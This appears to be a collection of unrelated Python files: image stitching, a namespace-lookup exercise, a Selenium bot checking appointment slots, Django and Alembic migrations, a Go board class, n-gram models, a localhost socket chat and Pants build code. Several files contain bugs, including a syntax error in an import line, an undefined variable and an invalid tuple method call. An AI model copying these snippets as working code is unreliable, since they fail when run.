h1_2, _ = homograph(img1, kp1, img2, kp2, good_matches, MIN_MATCHES, SHOW_IMG_STEPS, i)
if h1_2 is None:
break
height, width = img1.shape[:2]
# warp perspective using the homograph of match
img1_2 = cv2.warpPerspective(img1, h1_2, (width, height))
# overlay images
panorama_img = overlay_images(img1_2, img2)
if SHOW_IMG_STEPS:
cv2.imshow(f'panorama {i}', panorama_img)
cv2.waitKey(SHOW_IMG_STEPS_DELAY)
if image1.loaded:
non_processed.remove(image1)
if image2.loaded:
non_processed.remove(image2)
imgs.append(Image(panorama_img))
panorama_img = remove_border(panorama_img)
for non_processed_img in non_processed:
non_processed_img.img = remove_border(non_processed_img.img)
return panorama_img, [img.img for img in non_processed]
def overlay_images(img1_2, img2):
if OVERLAY_TYPE == OVERLAY_WEIGHTED:
panorama_img = cv2.addWeighted(img1_2, 0.5, img2, 0.5, 0)
else:
_, gray_1 = cv2.threshold(
src=cv2.cvtColor(img1_2, cv2.COLOR_RGB2GRAY),
thresh=1,
maxval=255,
type=cv2.THRESH_BINARY
)
_, gray_2 = cv2.threshold(
src=cv2.cvtColor(img2, cv2.COLOR_RGB2GRAY),
thresh=1,
maxval=255,
type=cv2.THRESH_BINARY
)
mask = cv2.bitwise_xor(gray_1, gray_2)
split_1 = cv2.split(img1_2)
split_2 = cv2.split(img2)
panorama_img = cv2.merge([
cv2.add(
cv2.bitwise_and(split_1[l_idx], mask),
split_2[l_idx]
)
for l_idx in range(len(split_1))
])
return panorama_img
def main():
images = [
'./resources/img1.png',
'./resources/img2.png',
'./resources/img3.png',
]
# images = [
# './resources/quarto1.jpg',
# './resources/quarto2.jpg',
# './resources/quarto3.jpg',
# ]
panorama_img, non_processed = panorama(images)
for i in range(len(non_processed)):
cv2.imshow(f'Error n{i + 1}', non_processed[i])
if panorama_img is not None:
cv2.imshow('Final panorama', panorama_img)
else:
error_img = np.zeros((640, 480, 1), np.uint8)
cv2.imshow('Final panorama', error_img)
cv2.waitKey(0)
if __name__ == '__main__':
main()
|
# # -*- coding: utf-8 -*-
# Реализуйте программу, которая будет эмулировать работу с пространствами имен. Необходимо реализовать поддержку создания пространств имен и добавление в них переменных.
# В данной задаче у каждого пространства имен есть уникальный текстовый идентификатор – его имя.
# Вашей программе на вход подаются следующие запросы:
# create <namespace> <parent> – создать новое пространство имен с именем <namespace> внутри пространства <parent>
# add <namespace> <var> – добавить в пространство <namespace> переменную <var>
# get <namespace> <var> – получить имя пространства, из которого будет взята переменная <var> при запросе из пространства <namespace>, или None, если такого пространства не сущет
# Рассмотрим набор запросов
# add global a
# create foo global
# add foo b
# create bar foo
# add bar a
# Структура пространств имен описанная данными запросами будет эквивалентна структуре пространств имен, созданной при выполнении данного кода
# a = 0
# def foo():
# b = 1
# def bar():
# a = 2
# В основном теле программы мы объявляем переменную a, тем самым добавляя ее в пространство global. Далее мы объявляем функцию foo, что влечет за собой создание локального для нее пространства имен внутри пространства global. В нашем случае, это описывается командой create foo global. Далее мы объявляем внутри функции foo функцию bar, тем самым создавая пространство bar внутри пространства foo, и добавляем в bar переменную a.
# Добавим запросы get к нашим запросам
# get foo a
# get foo c
# get bar a
# get bar b
# Представим как это могло бы выглядеть в коде
# a = 0
# def foo():
# b = 1
# get(a)
# get(c)
# def bar():
# a = 2
# get(a)
# get(b)
# Результатом запроса get будет имя пространства, из которого будет взята нужная переменная.
# Например, результатом запроса get foo a будет global, потому что в пространстве foo не объявлена переменная a, но в пространстве global, внутри которого находится пространство foo, она объявлена. Аналогично, результатом запроса get bar b будет являться foo, а результатом работы get bar a будет являться bar.
# Результатом get foo c будет являться None, потому что ни в пространстве foo, ни в его внешнем пространстве global не была объявлена переменная с.
# Более формально, результатом работы get <namespace> <var> является
# <namespace>, если в пространстве <namespace> была объявлена переменная <var>
# get <parent> <var> – результат запроса к пространству, внутри которого было создано пространство <namespace>, если переменная не была объявлена
# None, если не существует <parent>, т. е. <namespace> – это global
# Формат входных данных
# В первой строке дано число n (1 ≤ n ≤ 100) – число запросов.
# В каждой из следующих n строк дано по одному запросу.
# Запросы выполняются в порядке, в котором они даны во входных данных.
# Имена пространства имен и имена переменных представляют из себя строки длины не более 10, состоящие из строчных латинских букв.
# Формат выходных данных
# Для каждого запроса get выведите в отдельной строке его результат.
# Sample Input:
# 9
# add global a
# create foo global
# add foo b
# get foo a
# get foo c
# create bar foo
# add bar a
# get bar a
# get bar b
# Sample Output:
# global
# None
# bar
# foo
# num = int(input())
# cmd, name_sp, argv_n = input().split()
d = {"global": {"parent": None, "vars": []},}
def create_name_sp(ns, p):
global d
d.update({ns : {"parent": p, "vars": []}})
def add_var(ns, var):
global d
d[ns]["vars"].append(var)
def get_var(ns, var):
global d
if var in d[ns]["vars"]:
return ns
elif ns == "global" and var not in d["global"]["vars"]:
return None
else:
return get_var(d[ns]["parent"], var)
for _ in range(int(input())):
a = input().split()
if a[0] == "create":
create_name_sp(a[1], a[2])
elif a[0] == "add":
add_var(a[1], a[2])
elif a[0] == "get":
print(get_var(a[1], a[2]))
|
import os
from bs4 import BeautifulSoup
import datetime
from time import sleepimport datetime
from selenium import webdriver
email = input("Enter email: ")
password = input('Enter password: ')
month = input('Enter month: ')
day = input("Enter day: ")
interval = input('Enter time interval: ')
clicks = int(month) - datetime.date.today().month
br = False
url1 = "http://kolejka-wsc.mazowieckie.pl/rezerwacje/pol/login"
url2 = "http://kolejka-wsc.mazowieckie.pl/rezerwacje/pol/queues/200064/200084"
while True:
driver = webdriver.Chrome()
driver.get(url1)
driver.find_element_by_id("UserEmail").send_keys(email)
driver.find_element_by_id("UserPassword").send_keys(password)
driver.find_element_by_xpath("//input[@value='Zaloguj']").click()
driver.get(url2)
driver.execute_script('document.getElementById("terms").click()')
driver.find_element_by_tag_name("button").click()
# changing calendar to chosen month
for i in range(clicks):
driver.find_element_by_class_name("fa-chevron-circle-right").click()
source = driver.page_source
soup = BeautifulSoup(source, 'lxml')
# choose active days
divs = soup.find_all("div", class_="day good")
# ring an alarm if chosen day is active
for div in divs:
if str(day) == str(div.text):
print(str(datetime.datetime.now()) + " ---> " + "CHOSEN DAY ACTIVE :)")
os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (10, 440))
br = True
driver.close()
if br:
break
else:
print(str(datetime.datetime.now()) + " ---> " + "chosen day not active :(")
sleep(int(interval))
|
from django.db import models
# Create your models here.
class face(models.Model):
name = models.CharField(max_length=100)
role = models.CharField(max_length=20)
email = models.EmailField()
number = models.IntegerField()
emp_id = models.TextField(auto_created=True)
class gender(models.Model):
GENDER_CHOICES = (('M', 'Male'), ('F', 'Female'))
gender = models.CharField(max_length=1, choices=GENDER_CHOICES)
def __str__(self):
return self.name
|
# I pledge my honor that I have abided by the Stevens Honor System
# Ashley Cannon
def main():
print("This program generates usernames from a file of names. \n")
infilename = input("What files are the names in: ")
outfilename = input("Place names in this file: ")
infile = open(infilename, "r")
outfile = open(outfilename, "w")
for i in infile:
first, last = i.split()
names = (first[0:], last[0:]).upper()
print(names, file = outfile)
infile.close()
outfile.close()
print("Names have been written to:", oufilename)
main()
|
import rpy2
import rpy2.robjects.packages as rpackages
utils = rpackages.importr('utils')
utils.chooseCRANmirror(ind=1)
packnames = ('tuneR', 'seewave', 'fftw', 'caTools', 'randomForest', 'warbleR', 'mice', 'e1071', 'rpart', 'rpart-plot', 'xgboost', 'e1071')
from rpy2.robjects.vectors import StrVector
names_to_install = [x for x in packnames if not rpackages.isinstalled(x)]
if len(names_to_install) > 0:
utils.install_packages(StrVector(names_to_install))
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 by
# Randy Davila <davilar@uhd.edu>
# BSD license.
#
# Authors: Randy Davila <davilar@uhd.edu>
"""Function for reading in the conjecture data.
"""
import pickle
__all__ = ['get_conjectures']
def get_conjectures(target, family):
"""Returns current stored conjectures on graph invariant target.
Parameters
----------
target : string
A graph invariant computable by grinpy.
family : string
A name of a given graph family stored in TxGraffiti.
Returns
-------
db : dictionary
The dictionary with key values equal to conjectured inequalities
and whose values are associated with a given conjecture.
"""
with open(f'graph_data/{target}_{family}_conjectures', 'rb') as pickle_file:
db = pickle.load(pickle_file)
return db
def remove_duplicates(lst):
res = []
for x in lst:
if x not in res:
res.append(x)
return res
|
import os
import sys
import argparse
import math
import shutil
import time
import logging
from io import open
import numpy as np
import torch
from torch import nn
from torch.nn import init
from torch.nn.parameter import Parameter
import torch.nn.functional as F
import torch.optim as optim
from utils import get_xt,update_prob_estimates
from datasets import data_generator, adding_problem_generator
def add_task_train_online( net, optimizer, args, named_params, logger):
batch_size = args.batch_size
n_steps = args.epochs
c_length = args.bptt
losses = []
PARTS = args.parts #10
step = c_length // PARTS
logger.info('step = ' + str(step))
alpha = 0.05 #0.2
alpha1 = 0.005 #001
alpha2 = 0.01
# torch.autograd.set_detect_anomaly(True)
for i in range(n_steps):
s_t = time.time()
x,y = adding_problem_generator(batch_size, seq_len=c_length, number_of_ones=2)
x = x.cuda()
y = y.cuda()
data = x.transpose(0, 1)
y = y.transpose(0, 1)
net.train()
xdata = data.clone()
inputs = xdata
T = c_length
# h = net.init_hidden(batch_size)
# optimizer.zero_grad()
# # print(x.shape)
# loss, h = net.forward(inputs, y, h)
# # loss = (p+1/PARTS) * loss
# loss.backward()
# torch.nn.utils.clip_grad_norm_(net.parameters(), args.clip)
# optimizer.step()
optimizer.zero_grad()
# h = get_initial_hidden_state(net, batch_size, hidden_size)
h = net.init_hidden(batch_size)
x = data
loss, _ = net.forward(x, y, h)
loss_act = loss
loss.backward()
torch.nn.utils.clip_grad_norm_(net.parameters(), args.clip)
optimizer.step()
### Evaluate
net.eval()
x,y = adding_problem_generator(batch_size, seq_len=c_length, number_of_ones=2)
x = x.cuda()
y = y.cuda()
x = x.transpose(0, 1)
y = y.transpose(0, 1)
h = net.init_hidden(batch_size)
loss, _ = net.forward(x, y, h)
loss_act = loss
losses.append(loss_act.item())
if i%args.log_interval == 0:
logger.info('Update {}, Time for Update: {} , Average Loss: {}'
.format(i +1, time.time()- s_t, loss_act.item() ))
logger.info("Average loss: " + str(np.mean(np.array(losses))) )
logger.info('Losses : ' + str( losses ))
return losses
|
import socket
from threading import Thread
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_ip = "127.0.0.1"
port = 4455
s.bind((server_ip,port))
print("Server Is Running On " + server_ip +" "+ str(port))
s.listen(1)
conn, addr = s.accept()
print("Connected")
print(addr)
class send(Thread):
def run(self):
while True:
msg = input("Enter Your message : ")
msg = msg.encode()
conn.send(msg)
print("Your msg is sent. ")
class receive(Thread):
def run(self):
while True:
r_msg = conn.recv(1024)
r_msg = r_msg.decode()
print("received msg : " + r_msg)
t1 = send()
t2 = receive()
t1.start()
t2.start()
|
import pytest
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from pageObjects.checkOutPage import checkOutPage
from pageObjects.confirmPage import confirmPage
from pageObjects.homePage import HomePage
from utilities.BaseClass import BaseClass
# @pytest.mark.usefixtures("setup")
class TestOne(BaseClass):
def test_e2e(self):
log = self.getLogger()
nameList = ['Blackberry']
cartList = []
homePage = HomePage(self.driver)
# homePage.shopItems().click()
Checkoutpage = homePage.shopItems()
# here we can use driver in two ways one is passing the setup fixture into test case and also by defining request.cls.driver = driver then to self.driver
# you can only access the class driver is with the self
# carts = self.driver.find_element_by_css_selector(".card-title a")
# Checkoutpage = checkOutPage(self.driver)
carts = Checkoutpage.getCarts()
i = -1
for cart in carts:
i = i + 1
# name = cart.find_element_by_xpath("//div//h4//a")[i].text
name = cart.text
log.info(name)
print(name)
if name == "Blackberry":
# cart.find_elements_by_xpath("div//button").click()
Checkoutpage.getCardFooter()[i].click()
# self.driver.find_element_by_css_selector(".btn-primary").click()
Checkoutpage.goToCheckOutButton().click()
# items = self.driver.find_elements_by_xpath("//div[@class='media']//div//h4//a")
items = Checkoutpage.getItems()
for item in items:
cartList.append(item.text)
print(cartList)
log.info(cartList)
assert nameList == cartList
# self.driver.find_element_by_css_selector(".btn-success").click()
# Checkoutpage.clickOnCheckOut().click()
Confirmpage = Checkoutpage.clickOnCheckOut()
# self.driver.find_element_by_id("country").send_keys("Ind")
# Confirmpage = confirmPage(self.driver)
log.info("Passing the keyword as Ind ")
Confirmpage.getCountry().send_keys("Ind")
# wait = WebDriverWait(self.driver, 7)
# wait.until(expected_conditions.presence_of_element_located((By.LINK_TEXT, "India")))
self.verifyLinkPresence("India")
# self.driver.find_element_by_link_text("India").click()
Confirmpage.getSelectCountry().click()
# self.driver.find_element_by_css_selector("[for=checkbox2]").click()
Confirmpage.checkBox().click()
# self.driver.find_element_by_css_selector("[type='submit']").click()
Confirmpage.purchaseClick().click()
# successMessage = self.driver.find_element_by_class_name("alert-success").text
successMessage = Confirmpage.successMessage().text
print(successMessage)
log.info("Success message will be " + successMessage)
assert "Success!" in successMessage
self.driver.get_screenshot_as_file("photo.png")
|
# Generated by Django 3.0.3 on 2020-03-16 16:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0013_membre_mail'),
]
operations = [
migrations.AlterField(
model_name='membre',
name='imageProfil',
field=models.ImageField(blank=True, upload_to='imagesDeProfil/'),
),
migrations.AlterField(
model_name='membre',
name='mail',
field=models.EmailField(default='', max_length=50),
),
]
|
from gomill import sgf
# leftoffat: implementing navigation forwards and backward through the game.
class Goban:
"""Represents the go board. Handles stone placement, captures, etc"""
# enum values for the board array
EMPTY='.'
WHITE='w'
BLACK='b'
SCORE_BLACK='B'
SCORE_WHITE='W'
SCORE_DAME='d'
SCORING='s'
def __init__(self, board_size=19, file_name=None):
# Build the board intersections
self.board_size = board_size
num_points = board_size * board_size
self.board = [Goban.EMPTY] * num_points
self.def_draw_codes = self._make_default_draw_codes()
self.to_move = Goban.BLACK
self.black_captures = 0
self.white_captures = 0
self.last_move = None
self.passed_last = False
self.ko = None
self.hover = None
self.elapsed_time = 0
self.winner = Goban.EMPTY
self.move = 0
self.file_name = file_name
# Track our game in an easily saveable format!
self.sgf_game = None
if self.file_name is not None:
self.load_sgf(file_name)
else:
self.sgf_game = sgf.Sgf_game(self.board_size)
def load_sgf(self, file_name):
try:
with open(file_name, 'r') as fn:
self.sgf_game = sgf.Sgf_game.from_string(fn.read())
except IOError:
# fixme - this should be convertable into a dialog box... perhaps it should throw an exception of its own
print 'There was a problem loading the SGF file.'
# Do initial layout
self._place_initial_stones()
for node in self.sgf_game.get_main_sequence():
self._play_node(node)
if self.sgf_game.get_winner() is not None:
self.winner = self.sgf_game.get_winner()
self.to_move = None
def _place_initial_stones(self):
root = self.sgf_game.get_root()
if root.has_setup_stones():
black, white, empty = root.get_setup_stones()
for point in black:
self.board[self._real_pos(self._sgf_to_move(point))] = Goban.BLACK
for point in white:
self.board[self._real_pos(self._sgf_to_move(point))] = Goban.WHITE
for point in empty:
self.board[self._real_pos(self._sgf_to_move(point))] = Goban.EMPTY
# Play a single node from an sgf tree. Useful for warking the tree.
def _play_node(self, node):
color, pos = node.get_move()
if color is not None:
if pos is None:
self.pass_move(color)
else:
self.play_move(self._sgf_to_move(pos), color, add_sgf=False)
# fixme - add resignation detection
# Play all moves up to and including node, which should be
# an sgf.Tree_node
def play_to_node(self, node):
self.soft_reset()
for n in self.sgf_game.get_main_sequence():
self._sgf_play_node(self, n)
if n == node:
return
def play_to_move_n(self, n=None):
''' Play to the nth move. If n is None, play to the latest move '''
self.soft_reset()
if n is None or len(self.sgf_game.get_main_sequence()) < n:
n = len(self.sgf_game.get_main_sequence())
portion = self.sgf_game.get_main_sequence()[:n]
for node in portion:
self._play_node(node)
def save_sgf(self, file_name=None):
'''Saves the current game as an SGF file. If file_name is None, we use the previously specified filename.
If there is no previously specified filename, we raise an exception.'''
if self.file_name is None and file_name is not None:
self.file_name = file_name
if file_name is None:
file_name = self.file_name
if file_name is None:
return # fixme - this should be an exception instead
with open(file_name, 'w') as fn:
fn.write(self.sgf_game.serialise())
def set_hover(self, pos):
rpos = self._real_pos(pos)
if rpos == self.hover:
return
if not self._valid_move(rpos) or self.to_move == Goban.EMPTY:
self.clear_hover()
return
self.hover = rpos
def soft_reset(self):
"""Reset the board to a pre-game state, but preserves move history.
In other words, goes back to before move #1"""
# Clear the board by setting it to the same size it currently is at
self.set_board_size(self.board_size)
self.to_move = Goban.BLACK
self.black_captures = 0
self.white_captures = 0
self.last_move = None
self.passed_last = False
self.ko = None
self.hover = None
self.elapsed_time = 0
self.winner = Goban.EMPTY
self.move = 0
self._place_initial_stones()
def reset(self):
'''Fully resets the game. The only thing preserved is the SGF filename, if it is set '''
self.sgf_game = sgf.Sgf_game(self.board_size)
self.soft_reset()
def set_board_size(self, new_size):
"""Set the board to a new size. This will also
reset the board to a blank state, but will *not* reset captures, etc
(call reset() first if you want that)"""
self.board_size = new_size
num_points = self.board_size * self.board_size
self.board = [Goban.EMPTY] * num_points
def clear_hover(self):
self.hover = None
def play_move(self, pos, color=None, add_sgf=True):
'''
Plays a move
pos: a tuple containing row and column to play on
color: which color is playing. If not specified, the player whose turn it is is assumed
add_sgf: if True, this is a new move and should be recorded in the move history
return:
To help with drawing code efficiency, any modified positions are returned in a list.
This includes anything that the GUI may want to redraw in the wake of this move.
'''
if add_sgf and self.move != len(self.sgf_game.get_main_sequence()):
return
if color is None:
color = self.to_move
if self.to_move == Goban.EMPTY:
return None
rpos = self._real_pos(pos)
if not self._valid_move(rpos, color):
return None
self.board[rpos] = color
self._changed = []
self._changed.append(rpos)
if self.ko is not None:
self._changed.append(self.ko)
if self.last_move is not None:
self._changed.append(self.last_move)
self._capture(rpos)
self.last_move = rpos
self.passed_last = False
if add_sgf:
node = self.sgf_game.extend_main_sequence()
node.set_move(color, self._pos_to_sgf(pos))
self.to_move = self._other_color(color)
self.clear_hover()
# If there is a new ko, send that back too
if self.ko is not None:
self._changed.append(self.ko)
self.move += 1
return self._changed
def pass_move(self, color=None):
if color is None:
color = self.to_move
# If the game is over, fail silently
if color is None:
return
self._changed = []
if self.ko is not None:
self._changed.append(self.ko)
if self.last_move is not None:
self._changed.append(self.last_move)
node = self.sgf_game.extend_main_sequence()
node.set_move(color, None)
if self.passed_last:
self.to_move = Goban.EMPTY
self.winner = Goban.SCORING
self.auto_score()
return range(len(self.board))
else:
self.to_move = self._other_color(color)
self.passed_last = True
self.last_move = None
self.ko = None
return self._changed
def resign(self, color=None):
if color is None:
color = self.to_move
# If the game is over, fail silently
if color is None:
return
self._changed = []
if self.ko is not None:
self._changed.append(self.ko)
if self.last_move is not None:
self._changed.append(self.last_move)
self.passed_last = False
self.last_move = None
self.ko = None
self.winner = self._other_color(color)
self.to_move = Goban.EMPTY
return self._changed
def _capture(self, pos, color=None):
"""Look for stones captured on the 4 sides of pos, remove them and increment
capture counter. This pos must be a *real* position value, not an x,y tuple."""
if color is None:
color = self.to_move
# If we get here, we've definitely played a move,
# clearing any existing ko point
self.ko = None
# Who are we capturing
who = self._other_color(color)
captures = 0
for p in self._neighbors(pos):
if not self._on_board(p):
continue
if not self._num_liberties(p, who):
captures += self._delete_group(p)
if color == Goban.BLACK:
self.black_captures += captures
elif color == Goban.WHITE:
self.white_captures += captures
# Check for ko
if captures == 1 and self._num_liberties(pos, color) == 1:
# find the empty point
for p in self._neighbors(pos):
if self.board[p] == Goban.EMPTY:
self.ko = p
break
def _valid_move(self, pos, color=None):
if not self._on_board(pos):
return False
if color is None:
color = self.to_move
# Can't play atop another stone or on the ko point
if self.board[pos] != Goban.EMPTY or pos == self.ko:
return False
# Temporarily place the stone
self.board[pos] = color
liberties = self._num_liberties(pos, color)
opponent = self._other_color(color)
kills_group = False
for d in self._neighbors(pos):
if not self._on_board(d):
continue
if self._num_liberties(d, opponent) == 0:
kills_group = True
break
# Remove temporary stone
self.board[pos] = Goban.EMPTY
return liberties > 0 or kills_group
# Recursively find whether there are liberties for the group
# at pos.
def _num_liberties(self, pos, who):
if not self._on_board(pos) or self.board[pos] != who:
return -1
bs = self.board_size * self.board_size
checked = [False] * bs
return self._num_liberties_r(pos, who, checked)
def _num_liberties_r(self, pos, who, checked=None):
if checked[pos]:
return 0
else:
checked[pos] = True
square = self.board[pos]
if square == Goban.EMPTY:
return 1
elif square != who:
return 0
else:
liberties = 0
for d in self._neighbors(pos):
liberties += self._num_liberties_r(d, who, checked)
return liberties
# We don't need to worry about crossing ourselves with the
# recursion here, because we've already deleted the stone.
def _delete_group(self, pos):
if not self._on_board(pos):
return
who = self.board[pos]
if who == Goban.EMPTY:
return 0
return self._delete_group_r(pos, who)
def _delete_group_r(self, pos, who):
if not self._on_board(pos):
return 0
if self.board[pos] != who:
return 0
self.board[pos] = Goban.EMPTY
self._changed.append(pos)
num_deleted = 1
num_deleted += self._delete_group_r(pos + 1, who)
num_deleted += self._delete_group_r(pos - 1, who)
num_deleted += self._delete_group_r(pos + self.board_size, who)
num_deleted += self._delete_group_r(pos - self.board_size, who)
return num_deleted
def draw_code(self, pos):
if not self._on_board(pos):
return None
point = self.board[pos]
code = None
if point == Goban.EMPTY or point == Goban.SCORE_DAME:
code = self.def_draw_codes[pos]
elif point == Goban.BLACK:
code = 'b'
if pos == self.last_move:
code += 'Cw'
elif point == Goban.WHITE:
code = 'w'
if pos == self.last_move:
code += 'Cb'
elif point == Goban.SCORE_WHITE:
code = self.def_draw_codes[pos] + 'ws'
elif point == Goban.SCORE_BLACK:
code = self.def_draw_codes[pos] + 'bs'
if pos == self.ko:
code += 'S'
return code
def auto_score(self):
'''
Detects regions and assigns them to the appropriate player
This may not always guess correctly, so we also have API that
can manually change these things.
After calling this function, the entire board should be redrawn.
'''
for i in range(len(self.board)):
if self.board[i] == Goban.EMPTY:
bs = self.board_size * self.board_size
checked = set()
score = self._score_space(i, checked)
for c in checked:
self.board[c] = score
def _score_space(self, pos, checked):
if pos in checked:
return None
if self.board[pos] == Goban.BLACK:
return Goban.SCORE_BLACK
elif self.board[pos] == Goban.WHITE:
return Goban.SCORE_WHITE
checked.add(pos)
possible = set()
for i in self._neighbors(pos):
score = self._score_space(i, checked)
possible.add(score)
if Goban.SCORE_DAME in possible or (Goban.SCORE_BLACK in possible and Goban.SCORE_WHITE in possible):
return Goban.SCORE_DAME
elif Goban.SCORE_BLACK in possible:
return Goban.SCORE_BLACK
elif Goban.SCORE_WHITE in possible:
return Goban.SCORE_WHITE
else:
return None
def _make_default_draw_codes(self):
ret = []
for pos in range(len(self.board)):
if pos == 0:
ret.append('ul')
elif pos == self.board_size - 1:
ret.append('ur')
elif pos == self.board_size * self.board_size - self.board_size:
ret.append('dl')
elif pos == self.board_size * self.board_size - 1:
ret.append('dr')
elif pos in [60, 66, 72, 174, 180, 186, 288, 294, 300]:
ret.append('h')
elif pos < self.board_size - 1:
ret.append('u')
elif pos % self.board_size == 0:
ret.append('l')
elif pos > (self.board_size * self.board_size - self.board_size - 1):
ret.append('d')
elif pos % self.board_size == 18:
ret.append('r')
else:
ret.append('m')
return ret
def _real_pos(self, pos):
x,y = pos
return x * self.board_size + y
def _on_board(self, pos):
return pos >= 0 and pos < self.board_size * self.board_size
def _other_color(self, color):
if color == Goban.BLACK:
return Goban.WHITE
elif color == Goban.WHITE:
return Goban.BLACK
def _neighbors(self, pos):
neighbors = []
if pos >= self.board_size:
neighbors.append(pos - self.board_size)
if pos <= self.board_size * self.board_size - self.board_size - 1:
neighbors.append(pos + self.board_size)
if pos % self.board_size != 0:
neighbors.append(pos - 1)
if (pos + 1) % self.board_size != 0:
neighbors.append(pos + 1)
return neighbors
# Convert an sgf vector to a move tuple
def _sgf_to_move(self, move):
if move is None:
return None
x,y = move
new_x = self.board_size - 1 - x
return (new_x, y)
# Convert a 1-dimensional position to an sgf move
def _pos_to_sgf(self, pos):
x = self.board_size - 1 + (pos / self.board_size)
y = pos % self.board_size
return (x,y)
|
import re
import math
import collections
class LanguageModel:
def __init__(self, filenames):
self.text = ''
for filename in filenames:
self.text += LanguageModel.read_file(filename)
self.alphabets = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's',
't',
'u', 'v', 'w', 'x', 'y', 'z']
self.delta = 0.5
@staticmethod
def write_file_lang_model(map, filename):
with open(filename, 'w') as f:
for key in map:
f.write(key + ' = ' + str(map[key]) + '\n')
@staticmethod
def clean_sentence(sentence):
# new_sen = sentence.replace(" ", "").lower()
new_sen = re.sub('[^a-zA-Z\n]', '', sentence).lower()
# print("Clean sentence ", sentence, new_sen)
return new_sen
@staticmethod
def read_file(fileName):
with open(fileName, "r") as f:
for line in f:
string_txt = f.read().replace("\n", "")
string_txt = re.sub('[^a-zA-Z\n]', '', string_txt).lower()
# with open('test.txt', "w") as wr:
# wr.write(string_txt)
return string_txt
class Unigram(LanguageModel):
def __init__(self, filenames):
super().__init__(filenames)
self.alphabets_freq_map = {}
self.probs_alpha = {}
for c in self.text:
if c in self.alphabets_freq_map:
self.alphabets_freq_map[c] += 1
else:
self.alphabets_freq_map[c] = 1
self.generate_probabilities()
def print_dict(self):
for key in self.alphabets_freq_map:
print(key, self.alphabets_freq_map[key])
# print(len(self.alphabets_map))
def generate_probabilities(self):
temp_map = {}
for key in self.alphabets_freq_map:
key2 = '(' + key + ')'
temp_map[key2] = (self.alphabets_freq_map[key] + self.delta) / (len(self.text) + 26 * self.delta)
self.probs_alpha = collections.OrderedDict(sorted(temp_map.items()))
class Bigram(LanguageModel):
def __init__(self, filenames):
super().__init__(filenames)
self.map_size = 26
self.cond_probs = {}
self.bigram_matrix = [0] * self.map_size
for i in range(self.map_size):
self.bigram_matrix[i] = [0] * self.map_size
for i in range(0, len(self.text) - 1):
index_i = self.char_hash(self.text[i])
index_j = self.char_hash(self.text[i + 1])
self.bigram_matrix[index_i][index_j] += 1
self.count_char = [sum(i) for i in self.bigram_matrix]
self.generate_conditional_prob()
def char_hash(self, character):
return self.alphabets.index(character)
def get_char(self, index):
return self.alphabets[index]
def print_map(self):
for i in range(self.map_size):
print(self.bigram_matrix[i])
def generate_conditional_prob(self):
for i in range(self.map_size):
for j in range(self.map_size):
char_i = self.get_char(i)
char_j = self.get_char(j)
x = (self.bigram_matrix[i][j] + self.delta) / (self.count_char[i] + 26 * self.delta)
key = '(' + char_i + '|' + char_j + ')'
self.cond_probs[key] = x
|
"""add three time filed
Revision ID: ed535bd21f09
Revises: 0a43e5b16392
Create Date: 2019-12-12 13:44:51.913300
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'ed535bd21f09'
down_revision = '0a43e5b16392'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
pass
# ### end Alembic commands ###
|
from django_filters import rest_framework as filters
from mainapp.models import Event
class EventFilter(filters.FilterSet):
start_date = filters.DateTimeFromToRangeFilter(field_name='start_date')
class Meta:
model = Event
fields = ['start_date']
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
from abc import ABCMeta
from dataclasses import dataclass
from enum import Enum
from typing import ClassVar, Iterable, Mapping, Optional, Tuple, TypeVar, Union
from typing_extensions import final
from pants.core.subsystems.debug_adapter import DebugAdapterSubsystem
from pants.core.util_rules.environments import _warn_on_non_local_environments
from pants.engine.env_vars import CompleteEnvironmentVars
from pants.engine.environment import EnvironmentName
from pants.engine.fs import Digest, Workspace
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.specs_rules import (
AmbiguousImplementationsException,
TooManyTargetsException,
)
from pants.engine.process import InteractiveProcess, InteractiveProcessResult
from pants.engine.rules import Effect, Get, Rule, _uncacheable_rule, collect_rules, goal_rule, rule
from pants.engine.target import (
BoolField,
FieldSet,
NoApplicableTargetsBehavior,
Target,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
)
from pants.engine.unions import UnionMembership, UnionRule, union
from pants.option.global_options import GlobalOptions
from pants.option.option_types import ArgsListOption, BoolOption
from pants.util.frozendict import FrozenDict
from pants.util.memo import memoized
from pants.util.strutil import help_text, softwrap
logger = logging.getLogger(__name__)
_T = TypeVar("_T")
class RunInSandboxBehavior(Enum):
"""Defines the behavhior of rules that act on a `RunFieldSet` subclass with regards to use in
the sandbox.
This is used to automatically generate rules used to fulfill `experimental_run_in_sandbox`
targets.
The behaviors are as follows:
* `RUN_REQUEST_HERMETIC`: Use the existing `RunRequest`-generating rule, and enable cacheing.
Use this if you are confident the behaviour of the rule relies only on state that is
captured by pants (e.g. binary paths are found using `EnvironmentVarsRequest`), and that
the rule only refers to files in the sandbox.
* `RUN_REQUEST_NOT_HERMETIC`: Use the existing `RunRequest`-generating rule, and do not
enable cacheing. Use this if your existing rule is mostly suitable for use in the sandbox,
but you cannot guarantee reproducible behavior.
* `CUSTOM`: Opt to write your own rule that returns `RunInSandboxRequest`.
* `NOT_SUPPORTED`: Opt out of being usable in `experimental_run_in_sandbox`. Attempting to use
such a target will result in a runtime exception.
"""
RUN_REQUEST_HERMETIC = 1
RUN_REQUEST_NOT_HERMETIC = 2
CUSTOM = 3
NOT_SUPPORTED = 4
@union(in_scope_types=[EnvironmentName])
class RunFieldSet(FieldSet, metaclass=ABCMeta):
"""The fields necessary from a target to run a program/script."""
supports_debug_adapter: ClassVar[bool] = False
run_in_sandbox_behavior: ClassVar[RunInSandboxBehavior]
@final
@classmethod
def rules(cls) -> Iterable[Union[Rule, UnionRule]]:
yield UnionRule(RunFieldSet, cls)
if not cls.supports_debug_adapter:
yield from _unsupported_debug_adapter_rules(cls)
yield from _run_in_sandbox_behavior_rule(cls)
